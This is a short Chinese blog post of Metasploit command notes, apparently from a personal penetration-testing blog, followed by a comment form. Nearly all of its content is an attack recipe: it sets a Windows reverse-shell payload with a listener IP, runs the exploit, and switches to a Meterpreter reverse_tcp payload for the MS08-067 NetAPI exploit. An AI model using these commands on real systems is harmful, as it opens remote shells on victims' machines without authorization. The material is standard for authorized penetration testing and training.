最新消息:本站技术交流 QQ 群:28124927

MSF命令小记

渗透相关 exchen 3456浏览 0评论

set payload windows/shell_reverse_tcp //反向连接
set LHOST 192.168.200.148
show options
exploit
meterpreter是一个很强大的工具。
可以payload设置为meterpreter
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

转载请注明:exchen's blog » MSF命令小记

发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址